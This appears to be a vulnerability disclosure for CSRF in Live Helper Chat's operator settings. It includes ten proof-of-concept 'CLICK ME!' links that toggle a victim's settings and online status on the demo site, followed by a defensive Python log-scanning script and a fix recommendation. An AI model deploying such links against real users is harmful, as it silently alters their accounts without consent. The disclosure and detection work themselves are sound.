CSRF in the requests that enable or disable the following settings:
- Dark/bright
- Auto uppercase sentences
- Do not scroll to the bottom on chat open
- Auto preload previous visitor chat messages
- Load previous message on scroll
- New messages
- New chats
- Online
- Based on activity
- Visible
<a href="https://demo.livehelperchat.com/site_admin/front/switchdashboard/(action)/mode">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_uppercase/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/no_scroll_bottom/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_preload/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/scroll_load/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/chat_message/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/new_chat_sound/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setoffline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setalwaysonline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setinvisible/true">CLICK ME!</a>
An attacker can use this vulnerability to trick users into enabling or disabling personal settings on their accounts.
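For triage on the server side, the following added example (not part of the original report or of Live Helper Chat) scans access-log lines for GET requests to the setting-changing routes listed above whose Referer is missing or points to another host. It assumes a combined-format access log and uses the demo host from the links as the trusted origin; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit

# Setting-changing routes taken from the report's links (prefix /site_admin).
STATE_CHANGING = re.compile(
    r"^/site_admin/(?:front/switchdashboard/|user/(?:setsetting|setsettingajax|"
    r"setoffline|setalwaysonline|setinvisible)/)"
)
# Combined log format: ... "METHOD path HTTP/x" status bytes "referer" "agent"
LINE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def suspicious_requests(log_lines, trusted_host):
    """Return (path, referer) for setting changes not initiated from trusted_host."""
    hits = []
    for line in log_lines:
        m = LINE.search(line)
        if not m or m["method"] != "GET":
            continue
        path = urlsplit(m["path"]).path
        if not STATE_CHANGING.match(path):
            continue
        referer = m["referer"]
        # A missing Referer is flagged too; it can also come from privacy
        # settings or a typed URL, so treat these hits as leads, not proof.
        ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
        if ref_host != trusted_host:
            hits.append((path, referer))
    return hits

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2022:10:00:00 +0000] "GET /site_admin/user/setsetting/auto_uppercase/0 HTTP/1.1" 200 512 "https://demo.livehelperchat.com/site_admin/" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2022:10:05:00 +0000] "GET /site_admin/user/setoffline/true HTTP/1.1" 200 512 "https://forum.example/thread/42" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2022:10:06:00 +0000] "GET /site_admin/user/setinvisible/true HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2022:10:07:00 +0000] "GET /site_admin/chat/list HTTP/1.1" 200 2048 "https://forum.example/thread/42" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for path, referer in suspicious_requests(SAMPLE_LOG, "demo.livehelperchat.com"):
        print(f"possible CSRF: {path} (Referer: {referer})")
```

Log review only helps find past abuse; the fix is for these endpoints to require a per-session anti-CSRF token before changing a setting.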